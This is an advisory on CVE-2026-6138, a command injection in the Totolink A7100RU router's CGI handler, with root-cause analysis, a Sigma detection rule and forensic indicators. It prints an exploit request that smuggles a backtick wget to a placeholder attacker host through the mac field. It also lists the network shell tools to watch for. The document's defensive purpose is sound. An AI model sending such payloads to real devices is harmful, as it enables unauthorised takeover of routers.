CVE-2026-6138: Critical Remote OS Command Injection in Totolink A7100RU

Executive Summary

Note

TL;DR: A critical OS command injection vulnerability (CVE-2026-6138) exists in Totolink A7100RU firmware version 7.4cu.2313_b20191024. By injecting malicious payloads into the mac parameter of the setAccessDeviceCfg function within /cgi-bin/cstecgi.cgi, remote unauthenticated attackers can achieve full command execution with the privileges of the CGI process. The exploit is trivial to execute and already available in the public domain. Immediate isolation of affected devices is recommended.

The security of embedded networking hardware remains a primary vector for threat actors. CVE-2026-6138 highlights a catastrophic failure in input sanitization within the Totolink A7100RU CGI handler component. Given the device’s role in network edge infrastructure, this vulnerability represents a significant risk for lateral movement into internal segments.

Technical Vulnerability Analysis

The vulnerability resides within the /cgi-bin/cstecgi.cgi binary, specifically the setAccessDeviceCfg function. During the processing of the mac argument, the application fails to properly validate or sanitize the user-provided data before passing it to internal system utilities.

Specifically, the user-controlled mac parameter is passed to the Uci_Add_List function (from libcscommon.so). Through further manipulation, this input is embedded into a system command string handled by the CsteSystem function, which subsequently invokes execv(). Because the command construction is performed without adequate escaping, an attacker can break out of the intended argument context and append arbitrary shell commands.

Exploitation Workflow

1. Target Identification: Identify a reachable instance of Totolink A7100RU running firmware version 7.4cu.2313_b20191024.
2. Payload Crafting: Prepare a malicious string, such as a shell command (e.g., wget, curl, or a reverse shell), encapsulated in backticks or command separators within the mac field.
3. Exploitation: Submit the crafted POST request to the vulnerable endpoint.
4. Execution: The device’s CGI handler interprets the injected command and executes it with system privileges.

Exploit Payload Example

The following HTTP request demonstrates how an attacker might leverage this flaw:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: <TARGET_IP>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

{"topicurl":"setAccessDeviceCfg","mac":"`wget <ATTACKER_IP>:<PORT>/testpoc`"}

Forensic Analysis & Detection

Analyst teams should prioritize visibility into HTTP traffic targeting the /cgi-bin/ directory on edge routers.

Detection Rule (Sigma)

title: Totolink A7100RU Command Injection Attempt
logsource:
  category: web_server
detection:
  selection:
    url|contains: "/cgi-bin/cstecgi.cgi"
    http_method: "POST"
    body|contains: ["setAccessDeviceCfg", "mac"]
  condition: selection

Forensic Value

When investigating potential compromise, focus on the following indicators:

• Unusual HTTP POST Requests: Monitor logs for requests matching the patterns identified above.
• Unexpected Process Spawning: Look for evidence of wget, curl, sh, nc, or other network-utility processes spawned by the cstecgi.cgi process.
• Persistence: Ensure forensic images of the device are analyzed for unauthorized additions to startup scripts or configuration files, which could persist reboot cycles.

Sources

• CVE-2026-6138 (cve.org)
• VulDB VDB-357002
• GitHub PoC (Litengzheng)